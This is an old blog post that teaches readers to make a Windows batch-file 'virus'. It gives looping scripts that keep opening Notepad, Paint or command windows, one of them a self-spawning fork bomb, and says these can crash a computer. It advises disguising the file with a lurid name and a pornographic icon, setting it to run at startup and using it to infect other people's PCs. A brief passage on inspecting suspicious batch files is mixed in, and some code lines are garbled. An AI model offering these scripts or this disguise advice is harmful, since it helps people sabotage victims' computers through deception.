Thursday, January 17, 2008

Creating Simple Virus that could make weard things

Hi, try creating a text file in NOTEPAD and then add the required commands from the text given below,..............then save it as SEXYBOOBS.bat to make it appealing to most of the users......, now right click this file change its icon to an attaractive pic like porny pics etc...., goto Control Panel > Scheduled Tasks,...... here add this file to Schedule Run at startup,............

Thats all ---- Congratulations You have successfully Created a virus, and affected one's pc too with it................Bye

=============================================================

@echo off
:start
start notepad
goto start

that will open notepad over and over and if they dont close it it can crash their computer

to open the command window you have to use var. like %% (not going to explain var. it would be confusing)

@echo off
:whatever
start %0
goto whatever

this will open the black box over and over

6. Most command tricks

people will put it in a folder with a couple read me doc. and call it a game

people will say check this out it is so cool

people will say check out this hack or cheat i found for this game

to check if the are good do this

tell them to put it in a zip folder and send it

unzip and right click on the program(dont open it)

and press edit

that will show the sorce code and if you see something you dont like then delete it

Examples

for just a simp msg its

@echo off
echo *insert MSG here*
goto pause
ause
pause

for the a rapid command propt type screen its

@echo off
:whatever
start %0
goto whatever

for rapid note pad its


@echo off
:start
start notepad
goto start

for rapid ms paint its


@echo off
:start
start ms paint
goto start

Quite Long but good to try...

0 comments: